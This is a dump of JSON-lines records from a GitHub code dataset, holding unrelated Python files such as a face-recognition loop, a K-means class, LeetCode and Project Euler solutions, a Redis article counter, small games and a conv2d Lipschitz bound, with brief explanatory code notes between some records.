video_capture.read()\n\n # Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses)\n rgb_frame = frame[:, :, ::-1]\n\n predictions = predict(frame, model_path=\"trained_knn_model.clf\")\n\n # Print results on the console\n for name, (top, right, bottom, left), percen in predictions:\n print(\"- Found {} at ({}, {})\".format(name, left, top))\n\n # Display results overlaid on an image\n frame = show_prediction_labels_on_image(frame, predictions)\n\n # # Find all the faces and face enqcodings in the frame of video\n # face_locations = face_recognition.face_locations(rgb_frame)\n # face_encodings = face_recognition.face_encodings(rgb_frame, face_locations)\n\n # # Loop through each face in this frame of video\n # for (top, right, bottom, left), face_encoding in zip(face_locations, face_encodings):\n # # See if the face is a match for the known face(s)\n # matches = face_recognition.compare_faces(known_face_encodings, face_encoding)\n\n # name = \"Unknown\"\n\n # # If a match was found in known_face_encodings, just use the first one.\n # if True in matches:\n # first_match_index = matches.index(True)\n # name = known_face_names[first_match_index]\n\n # # Draw a box around the face\n # cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)\n\n # # Draw a label with a name below the face\n # cv2.rectangle(frame, (left, bottom - 
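The capture loop in this recognizer builds rgb_frame but then passes the raw BGR frame into predict; face_recognition's models expect RGB input, so a conversion step is normally wanted. A sketch (camera index 0 assumed):

import cv2
import face_recognition

ok, frame = cv2.VideoCapture(0).read()        # OpenCV frames arrive in BGR order
rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)  # face_recognition wants RGB
boxes = face_recognition.face_locations(rgb)
encodings = face_recognition.face_encodings(rgb, known_face_locations=boxes)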
35), (right, bottom), (0, 0, 255), cv2.FILLED)\n # font = cv2.FONT_HERSHEY_DUPLEX\n # cv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)\n\n # Display the resulting image\n cv2.imshow('Video', frame)\n\n # Hit 'q' on the keyboard to quit!\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# Release handle to the webcam\nvideo_capture.release()\ncv2.destroyAllWindows()","repo_name":"bhaweshchandola/Machine-Learning","sub_path":"Face Recognition/knn_live.py","file_name":"knn_live.py","file_ext":"py","file_size_in_byte":6821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"15234684310","text":"import os\nimport re\nimport sys\n\n\ndef main(argv):\n if len(argv) != 3:\n raise Exception(\n 'Usage: %s output_path list_files' % os.path.basename(argv[0]))\n\n output_path = argv[1]\n list_path = argv[2]\n\n with open(list_path) as list_file:\n file_names = list_file.read().split(' ')\n\n with open(output_path, 'wt') as output_file:\n for file_name in file_names:\n with open(file_name) as input_file:\n output_file.write('// %s\\n' % file_name)\n output_file.write(input_file.read())\n\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv))\n","repo_name":"eval1749/evita","sub_path":"evita/dom/bindings/scripts/concatenate.py","file_name":"concatenate.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"29923009671","text":"import math\n\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import confusion_matrix, ConfusionMatrixDisplay\n\nfrom ml.algo.k_means.Cluster import Cluster\n\n\nclass KMeans:\n\n def __init__(self, training_samples, validation_samples):\n self._training_samples = training_samples\n self._validation_samples = validation_samples\n\n def find_clusters(self, num_clusters):\n # number of dimensions for the centroid\n centroid_num_dimensions = self._training_samples[0].features.shape[0]\n clusters = [Cluster(centroid_num_dimensions) for _ in range(num_clusters)]\n distance_between_current_and_prev_centroid_for_clusters = [9999999999 for _ in range(len(clusters))]\n\n iter_num = 0\n\n while not all(map(lambda distance: math.isclose(distance, 0, abs_tol=0.001), distance_between_current_and_prev_centroid_for_clusters)):\n\n samples_by_clusters = self.group_samples_by_clusters(clusters, self._training_samples)\n\n for cluster, samples in samples_by_clusters.items():\n cluster.update_samples_in_cluster(samples)\n\n distance_between_current_and_prev_centroid_for_clusters = list(map(Cluster.distance_between_current_and_prev_centroid, clusters))\n\n print('Itr num = {}, difference in centroids from previous iteration = {}'.format(iter_num,\n distance_between_current_and_prev_centroid_for_clusters))\n\n iter_num += 1\n\n return self.mean_square_error(clusters), clusters\n\n @staticmethod\n def mean_square_error(clusters):\n return sum(map(Cluster.mean_square_error, clusters)) / len(clusters)\n\n def group_samples_by_clusters(self, clusters, samples):\n \"\"\"\n Group samples by clusters\n :param clusters: distinct clusters to group samples by\n :return: a map of cluster to list of samples belonging to that cluster\n \"\"\"\n samples_by_clusters = {cluster: list() for cluster in clusters}\n\n for sample in samples:\n distance_cluster_map = {cluster.find_distance_from_centroid(sample.features):cluster for cluster in clusters}\n cluster_for_sample = 
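The distance-keyed dict built just above silently drops a cluster whenever two centroids are exactly equidistant from a sample; taking the argmin directly avoids that, as in this sketch against the same Cluster interface:

def nearest_cluster(clusters, features):
    # min with a key function: no dict, no collisions on equal distances
    return min(clusters, key=lambda c: c.find_distance_from_centroid(features))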
distance_cluster_map[min(distance_cluster_map.keys())]\n samples_by_clusters[cluster_for_sample].append(sample)\n\n assert len(self._training_samples) == sum(map(len, samples_by_clusters.values())), 'Expected total number of training samples to match the sum of samples in all clusters'\n return samples_by_clusters\n\n @staticmethod\n def mean_square_separation(clusters):\n mss = 0\n\n for i in range(len(clusters)):\n for j in range(i):\n if i != j:\n mss += (clusters[i].find_distance_from_centroid(clusters[j].centroid) ** 2)\n\n return mss / ((len(clusters) * (len(clusters) - 1)) / 2)\n\n def mean_entropy(self, clusters):\n num_training_samples = len(self._training_samples)\n\n mean_entropy_value = 0\n\n for cluster in clusters:\n mean_entropy_value += ((len(cluster.samples_in_cluster) / num_training_samples) * cluster.entropy())\n\n return mean_entropy_value\n\n def compute_accuracy(self, clusters):\n predicted_labels = []\n actual_labels = []\n correct_predictions = 0\n\n for validation_sample in self._validation_samples:\n distance_cluster_map = {cluster.find_distance_from_centroid(validation_sample.features):cluster for cluster in clusters}\n cluster_for_sample = distance_cluster_map[min(distance_cluster_map.keys())]\n\n predicted_label = cluster_for_sample.most_common_label()\n actual_label = validation_sample.true_class_label\n\n if predicted_label == actual_label:\n correct_predictions += 1\n\n predicted_labels.append(predicted_label)\n actual_labels.append(actual_label)\n\n validation_samples_confusion_matrix = confusion_matrix(y_true=actual_labels, y_pred=predicted_labels)\n\n confusion_matrix_display = ConfusionMatrixDisplay(validation_samples_confusion_matrix, display_labels=range(10))\n confusion_matrix_display.plot(values_format='d')\n\n plt.title('Confusion matrix')\n\n plt.savefig('out/confusion-matrix.png', format='png', dpi=1200)\n plt.show()\n\n accuracy = (correct_predictions / len(self._validation_samples)) * 100\n print('Accuracy = {}%'.format(accuracy))\n\n @staticmethod\n def print_centroid(clusters):\n for num, cluster in enumerate(clusters):\n plt.imshow(cluster.centroid.reshape(8,8), cmap='Greys')\n\n common_label = cluster.most_common_label()\n plt.title('No samples in cluster' if common_label is None else 'Samples with the most common class label in this cluster = {}'.format(common_label))\n\n plt.savefig('out/{}-centroid-visual.png'.format(num), format='png', dpi=1200)\n plt.show()\n","repo_name":"pkaran57/ML","sub_path":"ml/algo/k_means/KMeans.py","file_name":"KMeans.py","file_ext":"py","file_size_in_byte":5008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"74274596951","text":"from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.urls import include, path\n\nfrom drf_yasg2 import openapi\nfrom drf_yasg2.views import get_schema_view\n\nfrom rest_framework.permissions import AllowAny\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"Helsi_clone API\",\n default_version='v1',\n description=\"About\",\n terms_of_service=\"https://www.google.com/policies/terms/\",\n contact=openapi.Contact(email=\"contact@snippets.local\"),\n license=openapi.License(name=\"BSD License\"),\n ),\n public=True,\n permission_classes=[AllowAny],\n)\nurlpatterns = [\n path('auth', include('apps.auth.urls')),\n path('users', include('apps.users.urls')),\n path('doctors', include('apps.doctors.urls')),\n path('patients', include('apps.patients.urls')),\n path('medical_cards', 
include('apps.medical_cards.urls')),\n path('doc',schema_view.with_ui('swagger',cache_timeout=0)),\n]\n\n# handler500 = 'rest_framework.exceptions.server_error'\n# handler400 = 'rest_framework.exceptions.bad_request'\n\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"KuzykY/helsi-clone","sub_path":"backend/configs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"32717976155","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\"\"\"\n Goal: recover the binary search tree which has two elements exchanged.\n Idea: \n 1.Just like sorted linked list, both moving-forward one and moving\n -backward one will make mistake when comparing with the elements\n between the moved position and orignal position. And when we tra-\n verse the binary search tree inorder, it's just the same as the\n sorted linked list.(Notice that the two positions can be adjacent!)\n 2. Morris Traversal can achieve O(1) space cost. \n\"\"\"\nclass Solution(object):\n def recoverTree(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: void Do not return anything, modify root in-place instead.\n \"\"\"\n if not root: return None\n INF = 1e10\n visited_node= TreeNode(-INF)\n wrong_node1 = wrong_node2 = None\n wrong_node1_next = None\n stack = []\n cur_node = root\n while stack or cur_node:\n if cur_node:\n # first go left and push all node into stack(this is the\n # first-time visit for each node)\n stack.append(cur_node)\n cur_node = cur_node.left\n else:\n # once reach the left-bottom None, pop out node from stack,\n # which is the second time visit for the popped node\n cur_node = stack.pop()\n # find the inorder node\n if visited_node.val >= cur_node.val:\n if not wrong_node1:\n wrong_node1 = visited_node\n wrong_node1_next = cur_node\n else:\n wrong_node2 = cur_node\n break\n visited_node = cur_node\n # after that we will go right, start to find next inorder node\n # (root --> the deepest left(None) --> back one step(found inorder node)\n # --> assign its right node as root)\n cur_node = cur_node.right\n\n if wrong_node1:\n # These two exchanged positions are adjacent in inorder traversal\n if not wrong_node2: wrong_node2 = wrong_node1_next \n temp = wrong_node1.val\n wrong_node1.val = wrong_node2.val\n wrong_node2.val = temp\n\n return None\n","repo_name":"LingxiaoShawn/leetcode","sub_path":"tree/99.recover-binary-search-tree.py","file_name":"99.recover-binary-search-tree.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"21102494471","text":"\"\"\"\nNote the performance for SPM is not great at high C-rates\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nimport SPPy\n\n\n# Experimental data\ndf_exp = pd.read_csv('DST_25C.csv')\ndf_exp = df_exp[df_exp['Step_Index'] > 4]\nt_exp = df_exp['t [s]'].to_numpy()\nt_exp = t_exp - t_exp[0]\nI_exp = df_exp['I [A]'].to_numpy()\nV_exp = df_exp['V [V]'].to_numpy()\n\n# Modelling parameters\nSOC_n_min=0.01073305\nSOC_n_max=0.82852023\nSOC_p_min=0.41553058\nSOC_p_max=0.90207103\n\nSOC_init_p, SOC_init_n = SOC_p_min, SOC_n_max\nT = 298.15 # in K\n\n# Setup cycler and battery cell\ncycler = SPPy.CustomCycler(t_array=t_exp, I_array=I_exp, 
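The recover-BST docstring above notes that Morris traversal reaches O(1) space, but the code still uses an explicit stack; a self-contained sketch of the Morris inorder walk itself (threading right pointers back to the current node):

def morris_inorder(root):
    out, cur = [], root
    while cur:
        if cur.left is None:
            out.append(cur.val)           # no left child: visit, go right
            cur = cur.right
        else:
            pred = cur.left               # rightmost node of the left subtree
            while pred.right and pred.right is not cur:
                pred = pred.right
            if pred.right is None:
                pred.right = cur          # lay a thread back to cur
                cur = cur.left
            else:
                pred.right = None         # thread found: unlink, visit, go right
                out.append(cur.val)
                cur = cur.right
    return out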
SOC_LIB=1.0)\ncycler.plot()\ncell = SPPy.BatteryCell(parameter_set_name='Calce_OCV', SOC_init_p=SOC_init_p, SOC_init_n=SOC_init_n, T=T)\nsolver = SPPy.SPPySolver(b_cell=cell, N=5, isothermal=True, degradation=False, electrode_SOC_solver='poly')\n\n# simulate and plot\nsol = solver.solve(cycler_instance=cycler, verbose=True, t_increment=1)\n\n# plot\nplt.plot(t_exp, V_exp)\nplt.plot(sol.t, sol.V)\n\nplt.show()\n\nsol.comprehensive_plot()\n\n\n","repo_name":"m0in92/SPPy","sub_path":"examples/custom_cycler/Calce_DST.py","file_name":"Calce_DST.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"1324379768","text":"# Time complexity: O(n). \n \n# Auxiliary Space: O(n). \n\n# intution : use LPS algorithm\n\ndef computeLPSArray(string):\n \n M = len(string)\n lps = [None] * M\n \n length = 0\n lps[0] = 0 \n\n i = 1\n while i < M:\n \n if string[i] == string[length]:\n \n length += 1\n lps[i] = length\n i += 1\n \n else: # (str[i] != str[len])\n \n if length != 0:\n \n length = lps[length - 1]\n \n # Also, note that we do not\n # increment i here\n \n else: # if (len == 0)\n \n lps[i] = 0\n i += 1\n \n return lps\n \n\ndef solve(string):\n \n revStr = string[::-1]\n \n # Get concatenation of string,\n # special character and reverse string\n concat = string + '$' + revStr\n\n \n # Get LPS array of this\n # concatenated string\n lps = computeLPSArray(concat)\n \n # By subtracting last entry of lps\n # vector from string length, we\n # will get our result\n return len(string) - lps[-1]\n \n\n\nstring = \"AACECAAAA\"\nprint(solve(string))\n","repo_name":"Thapamanish/450DSA","sub_path":"String/minInsertionAtBeginningTomakeAStringPalin.py","file_name":"minInsertionAtBeginningTomakeAStringPalin.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24599626095","text":"from datetime import datetime\nimport math\nimport time\n\n\ndef main():\n start_time = datetime.now() \n ans = my_func()\n dt = datetime.now() - start_time \n ms = (dt.days * 24 * 60 * 60 + dt.seconds) * 1000 + dt.microseconds / 1000.0\n print(f\"Ans {ans}, Duration: {ms/1000:.2f}\" % [ans,ms])\n\n\ndef my_func():\n max_count = 0\n max_p = 0\n for i in range(2,1001,2):\n no_of_train = get_no_of_trian(i)\n if(no_of_train > max_count):\n max_count = no_of_train\n max_p = i\n \n return max_p\n\n\n\ndef get_no_of_trian(p):\n count = 0\n\n for c in range(int(p/2)+1,-1,-1):\n \n if(3 * c - 3 < p):\n break\n\n for b in range(c-1,1,-1):\n\n if(c + 2 * b - 1 < p):\n break\n\n for a in range(b-1,1,-1):\n if(a+b+c < p):\n break\n \n if(a+b+c == p):\n if(a*a) + (b*b) == (c*c):\n count+=1\n\n return count\n\nmain()","repo_name":"nabint/project_euler","sub_path":"problem39.py","file_name":"problem39.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73142095831","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 08 15:30:33 2017\n\n@author: ligong\n\n@description:这是用来计数article的阅读uv,推送uv,以及点击率的uv\n\"\"\"\nfrom util import init_redis\n\nclass article_info(object):\n def __init__(self,name,config):\n \"\"\"\n name:对应的名字\n \"\"\"\n self.name = name.upper()\n article_info_redis = config['article_info_redis']\n host,port,db = article_info_redis['host'],article_info_redis['port'],article_info_redis['db']\n \n #初始化redis链接\n 
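Spot checks for the KMP-based solve above: the answer is len(s) minus the longest palindromic prefix, which the LPS table of s + '$' + reversed(s) reads off directly (assuming solve is in scope):

assert solve("AACECAAAA") == 2   # prepend "AA" -> "AAAACECAAAA" is a palindrome
assert solve("ABC") == 2         # prepend "CB" -> "CBABC"
assert solve("ABA") == 0         # already a palindrome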
self.article_info_redis_conn = init_redis(host,port,db)\n \n #push文章的前缀\n self.push_prefix = 'ARTICLE_PUSH_%s_%s'\n \n #read文章的前缀\n self.read_prefix = 'ARTICLE_READ_%s_%s'\n \n #ratio文章的前缀\n self.ratio_prefix = 'ARTICLE_RATIO_%s_%s'\n \n #article信息\n self.article_info_prefix = 'ARTICLE_INFO_%s'\n \n def update_article_info(self,article_id,key,value):\n \"\"\"\n 更新文章信息\n \"\"\"\n self.article_info_redis_conn.hset(self.article_info_prefix % article_id,key,value)\n \n def update_article_ratio(self,article_id):\n \"\"\"\n 更新文章的点击率\n \"\"\"\n push_key = self.push_prefix % (self.name,article_id)\n read_key = self.read_prefix % (self.name,article_id)\n \n push_num = self.article_info_redis_conn.pfcount(push_key)\n read_num = self.article_info_redis_conn.pfcount(read_key)\n #有一个值是空,则不做任何(没有值)\n if push_num == None or read_num == None or int(push_num) == 0 or int(read_num) == 0:\n return\n \n ratio_key = self.ratio_prefix % (self.name,article_id)\n self.article_info_redis_conn.set(ratio_key,float(read_num)/float(push_num))\n \n def update_article_push(self,article_id,usid):\n \"\"\"\n 更新文章的推送\n \"\"\"\n push_key = self.push_prefix % (self.name,article_id)\n self.article_info_redis_conn.pfadd(push_key,usid)\n self.update_article_ratio(article_id)\n \n def update_article_read(self,article_id,usid):\n \"\"\"\n 更新文章的阅读\n \"\"\"\n read_key = self.read_prefix % (self.name,article_id)\n self.article_info_redis_conn.pfadd(read_key,usid)\n self.update_article_ratio(article_id)\n\n def read_ratio(self,article_id):\n \"\"\"\n 点击率\n \"\"\"\n ratio_key = self.ratio_prefix % (self.name,article_id)\n ratio = self.article_info_redis_conn.get(ratio_key)\n if ratio:\n return float(ratio)\n return 0\n \n def push_num(self,article_id):\n \"\"\"\n 推荐次数\n \"\"\"\n push_key = self.push_prefix % (self.name,article_id)\n push_num = self.article_info_redis_conn.pfcount(push_key) \n if push_num:\n return int(push_num)\n return 0\n\nif __name__ == '__main__':\n config = {'article_info_redis':{'host':'127.0.0.1','port':6379,'db':1}}\n ati = article_info('test',config)\n import time,random\n for i in range(10000):\n ati.update_article_info(i,'create_time',int(time.time())-8640*i)\n t = random.randint(0,9999)\n ati.update_article_push(i,i*3)\n ati.update_article_read(t,i*2)\n\n","repo_name":"cash2one/toutiao-1","sub_path":"toutiao_cache/article_info.py","file_name":"article_info.py","file_ext":"py","file_size_in_byte":3357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"11163183883","text":"# Улучшаем задачу 2.\n# Добавьте возможность запуска функции “угадайки” из модуля в командной строке терминала.\n# Строка должна принимать от 1 до 3 аргументов: параметры вызова функции.\n# Для преобразования строковых аргументов командной строки в числовые параметры используйте\n# генераторное выражение.\n\n\"\"\"\nThis module will let you play \"the guess number\" game\nBut here you will be able to use terminal to communicate with the game\n\"\"\"\nfrom random import randint as ri\nfrom sys import argv\n\n__all__ = ['guessing']\n\ndef guessing(less_border: int, up_border: int, number_of_tries: int)->bool:\n num_to_guess = ri(less_border,up_border)\n count_of_tries = 0\n message = ''\n while count_of_tries < number_of_tries:\n num_from_user = int(input('Please enter the number: '))\n #num_from_user = int(argv[1])\n if num_from_user == num_to_guess:\n print('You guessed!!!')\n return True\n elif num_from_user > num_to_guess:\n message = 'This number is too big, try again.'\n elif 
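A condensed sketch of the HyperLogLog pattern this class is built on, using redis-py directly (key names follow the prefixes above; the user ids and a reachable local server are assumptions):

import redis  # assumes redis-py and a reachable server

r = redis.Redis(host="127.0.0.1", port=6379, db=1)
r.pfadd("ARTICLE_PUSH_TEST_42", "u1", "u2", "u3")   # approximate push UV
r.pfadd("ARTICLE_READ_TEST_42", "u2")               # approximate read UV
pushes = r.pfcount("ARTICLE_PUSH_TEST_42")
reads = r.pfcount("ARTICLE_READ_TEST_42")
print(reads / pushes if pushes else 0.0)            # estimated click-through ratio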
num_from_user < num_to_guess:\n message = 'This number is too small, try again.'\n print(message)\n print(\"You could not guess, sorry...\")\n return False\n\nif __name__ == '__main__':\n nums = (num for num in argv[1:])\n print(guessing(*(int(num) for num in nums)))\n # name, *params = argv\n # print(guessing(*(int(num) for num in params)))\n\n","repo_name":"MarSerMer/Python_practice_2","sub_path":"Python_practice_2/seminar_6/sem_6_task_3_improve_guess_number.py","file_name":"sem_6_task_3_improve_guess_number.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6729576803","text":"import pyxel\nfrom Actor.Player import Player\nimport ResourceHelper\nfrom Vector2 import Vector2\nfrom Level import Level\nfrom Shop import Shop\nimport Config\nimport random\nimport math\nimport os\nimport sys\nimport threading\nimport time\n\n# Allow imports from all project directories\nsys.path.insert(0, sys.path[0])\n# sys.path.insert(1, os.path.join(sys.path[0], \"Map\"))\n# sys.path.insert(2, os.path.join(\n# os.path.join(sys.path[0], \"Map\"), \"TilePresets\"))\n\n\nclass App:\n def __init__(self):\n pyxel.init(Config.SCREEN_HEIGHT, Config.SCREEN_WIDTH)\n pyxel.mouse(True)\n # We load all the resources here\n pyxel.load(\"Resources\\\\resources.pyxres\")\n\n pyxel.image(1).load(0, 0, \"Resources\\\\LoadingText.png\")\n\n self.playMusic = True\n pyxel.playm(0, loop=True)\n self.reset()\n pyxel.run(self.update, self.draw)\n\n def reset(self):\n self.player = Player()\n self.levelNumber = 0\n self.inShop = False\n self.shop = Shop(self.player)\n self.gold = 0\n self.loadNextLevel()\n\n def loadNextLevelInternal(self):\n self.loadingLevel = True\n self.level = Level(self.levelNumber, self.player)\n self.loadingLevel = False\n\n def loadNextLevel(self):\n self.loadingLevel = True\n self.levelNumber += 1\n loadingThread = threading.Thread(target=self.loadNextLevelInternal)\n loadingThread.start()\n pyxel.cls(7)\n imageSize = 300\n offsetX = (Config.SCREEN_WIDTH - imageSize) / 2\n offsetY = (Config.SCREEN_HEIGHT - imageSize) / 2\n pyxel.blt(offsetX, offsetY, 1, 0, 0, imageSize, imageSize)\n pyxel.flip()\n while(self.loadingLevel):\n time.sleep(0.1)\n\n def update(self):\n if self.inShop:\n done, self.gold = self.shop.update(self.gold)\n if done:\n self.inShop = False\n pyxel.stop(0)\n if self.playMusic:\n pyxel.playm(0, loop=True)\n self.loadNextLevel()\n\n return\n\n status = self.level.update(self)\n if (status == 1 or pyxel.btnp(pyxel.KEY_P)):\n pyxel.stop(0)\n if self.playMusic:\n pyxel.playm(1, loop=True)\n self.inShop = True\n elif(status == 2):\n self.reset()\n\n if (pyxel.btnp(pyxel.KEY_O)):\n self.playMusic = not self.playMusic\n if self.playMusic:\n pyxel.playm(0, loop=True)\n else:\n pyxel.stop(0)\n\n if (pyxel.btnp(pyxel.KEY_I)):\n self.gold += 100\n\n def draw(self):\n pyxel.cls(0)\n if self.inShop:\n self.shop.draw()\n else:\n self.level.draw()\n\n pyxel.blt(0, 0, 0, 0, 64, 16, 16, 3)\n pyxel.text(16, 6, f\"{self.gold}\", 7)\n\n\nApp()\n","repo_name":"Magxm/FIT2-Example","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7275719529","text":"import math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom scipy.sparse import linalg\n\n\n@torch.no_grad()\ndef lip_constant(kernel, imsize, transpose=False, sqrt=False, **kwargs):\n 
out_channels, in_channels, _, _ = kernel.shape\n channels = out_channels if transpose else in_channels\n height, width = imsize\n dim = channels * height * width\n\n def matvec(v):\n v = torch.tensor(v, dtype=kernel.dtype, device=kernel.device)\n v = v.view(1, channels, height, width)\n if transpose:\n v = F.conv_transpose2d(v, kernel, **kwargs)\n v = F.conv2d(v, kernel, **kwargs)\n else:\n v = F.conv2d(v, kernel, **kwargs)\n v = F.conv_transpose2d(v, kernel, **kwargs)\n return v.view(-1).cpu().numpy()\n\n conv = linalg.LinearOperator((dim, dim), matvec=matvec)\n eig = linalg.eigsh(conv, k=1, which='LM', return_eigenvectors=False).item()\n if sqrt:\n eig = math.sqrt(eig)\n\n return eig\n\n\nclass LipBoundConv2d(nn.Module):\n \"\"\"A module to estimate the (squared) Lipschitz constant of a Conv2d layer.\n\n The Lipschitz constant of a Conv2d is the largest singular value of the\n corresponding Toeplitz matrix. This module computes a close lower bound of\n the constant that is very fast, based on the approximation developed in\n \"On lipschitz regularization of convolutional layers using toeplitz matrix\n theory\" by Araujo et al., 2020.\n\n For ISTA we need the max eigenvalue of W^T W, corresponding to the square\n of the max singular value of W. Hence we set sqrt=False by default for\n the classical ISTA use case.\n \"\"\"\n def __init__(self, kernel_size, padding, stride=1, sample=50, sqrt=False):\n super().__init__()\n assert len(kernel_size) == 4\n if not kernel_size[-1] == kernel_size[-2]:\n raise ValueError(\"The last 2 dim of the kernel must be equal.\")\n if not kernel_size[-1] % 2 == 1:\n raise ValueError(\"The dimension of the kernel must be odd.\")\n if not stride == 1:\n raise NotImplementedError(\"LipBound not implemented for stride > 1.\")\n ksize = kernel_size[-1]\n self.ksize = ksize\n self.sqrt = sqrt\n\n # define frequencies \\omega0 and \\omega1\n x = torch.linspace(0, 2*math.pi, sample)\n w0, w1 = torch.meshgrid(x, x)\n w0 = w0.reshape(-1,1)\n w1 = w1.reshape(-1,1)\n\n # define location indices h0 and h1\n p_index = 1.0 + torch.arange(padding-ksize, padding)\n H0, H1 = torch.meshgrid(p_index, p_index)\n H0 = H0.reshape(1,-1)\n H1 = H1.reshape(1,-1)\n buf = (w0 * H0 + w1 * H1).T\n self.register_buffer('buf', buf)\n\n def forward(self, kernel):\n assert kernel.dim() == 4\n assert kernel.size(2) == kernel.size(3) == self.ksize\n if kernel.size(0) > kernel.size(1):\n kernel = kernel.transpose(0,1)\n\n real = torch.cos(self.buf) # [K**2, S**2]\n imag = torch.sin(self.buf)\n\n kernel = kernel.flatten(2) # [Co, Ci, K**2]\n poly_real = torch.matmul(kernel, real) # [Co, Ci, S**2]\n poly_imag = torch.matmul(kernel, imag) # [Co, Ci, S**2]\n poly1 = poly_real.square().sum(1) # [Co, S**2]\n poly2 = poly_imag.square().sum(1) # [Co, S**2]\n poly = poly1 + poly2\n bound = poly.max(-1)[0].sum() # maximum eigenvalue of W^T W\n if self.sqrt:\n bound = bound.sqrt() # maximum singular value of W\n\n return bound\n\n\ndef lip_bound_conv2d(kernel, padding, stride=1, sample=50, sqrt=False):\n \"\"\"functional variant of the above module\"\"\"\n assert kernel.dim() == 4\n if not kernel.size(-1) == kernel.size(-2):\n raise ValueError(\"The last 2 dim of the kernel must be equal.\")\n if not kernel.size(-1) % 2 == 1:\n raise ValueError(\"The dimension of the kernel must be odd.\")\n if not stride == 1:\n raise NotImplementedError(\"LipBound not implemented for stride > 1.\")\n ksize = kernel.size(-1)\n if kernel.size(0) > kernel.size(1):\n kernel = kernel.transpose(0,1)\n\n # define frequencies 
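For comparison with the eigsh call above, the same largest eigenvalue of W^T W can be estimated with a few steps of plain power iteration on the conv/conv-transpose pair; a sketch (the iteration count is a tunable assumption):

import torch
import torch.nn.functional as F

@torch.no_grad()
def power_iter_lip(kernel, imsize, iters=50, **kwargs):
    # power iteration on v -> W^T W v; returns the squared spectral norm
    _, in_channels, _, _ = kernel.shape
    v = torch.randn(1, in_channels, *imsize, dtype=kernel.dtype)
    for _ in range(iters):
        u = F.conv2d(v, kernel, **kwargs)
        v = F.conv_transpose2d(u, kernel, **kwargs)
        v = v / v.norm()
    u = F.conv2d(v, kernel, **kwargs)
    return (u.norm() ** 2).item()   # Rayleigh quotient, since ||v|| == 1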
\\omega0 and \\omega1\n x = torch.linspace(0, 2*math.pi, sample)\n w0, w1 = torch.meshgrid(x, x)\n w0 = w0.reshape(-1,1)\n w1 = w1.reshape(-1,1)\n\n # define location indices h0 and h1\n p_index = 1.0 + torch.arange(padding-ksize, padding)\n H0, H1 = torch.meshgrid(p_index, p_index)\n H0 = H0.reshape(1,-1)\n H1 = H1.reshape(1,-1)\n buf = (w0 * H0 + w1 * H1).T\n\n real = torch.cos(buf) # [K**2, S**2]\n imag = torch.sin(buf)\n\n kernel = kernel.flatten(2) # [Co, Ci, K**2]\n poly_real = torch.matmul(kernel, real) # [Co, Ci, S**2]\n poly_imag = torch.matmul(kernel, imag) # [Co, Ci, S**2]\n poly1 = poly_real.square().sum(1) # [Co, S**2]\n poly2 = poly_imag.square().sum(1) # [Co, S**2]\n poly = poly1 + poly2\n bound = poly.max(-1)[0].sum() # maximum eigenvalue of W^T W\n if sqrt:\n bound = bound.sqrt() # maximum singular value of W\n\n return bound","repo_name":"rfeinman/pytorch-lasso","sub_path":"lasso/conv2d/lip_const.py","file_name":"lip_const.py","file_ext":"py","file_size_in_byte":5033,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"5"} +{"seq_id":"74336334553","text":"# Author: Alberto Vázquez\r\n# https://github.com/alb3rtov/\r\n# https://informaticaenuno.wordpress.com/\r\n# Version alfa-0.12.8\r\n# CONFIGURATION MENU ACTIVE DIRECTORY\r\n\r\n\r\n##############################\r\n### PACKAGES IMPORTED ###\r\n##############################\r\n\r\nimport time\r\nimport os, sys\r\nimport signal\r\nimport subprocess\r\nimport os.path as path\r\nfrom management import bfunc\r\n#import glob\r\n\r\n\r\n#Function to avoid Ctrl+C\r\ndef sigint_handler(signum, frame):\r\n print();\r\n print(\"Please, don't press Ctrl+C\");\r\n print();\r\n time.sleep(1);\r\n\r\nsignal.signal(signal.SIGINT, sigint_handler)\r\n\r\n\r\n############################### Fourth Menu Options ######################################\r\n# The first three options are stored in bfunc.py script\r\n\r\n\r\n#Fourth Option, check FSMO Roles\r\ndef FSMORoles():\r\n print();\r\n print(\" [*] Checking if your system is Domain Controller \",end=\"\");\r\n bfunc.LoadAnimation();\r\n print();\r\n\r\n p = 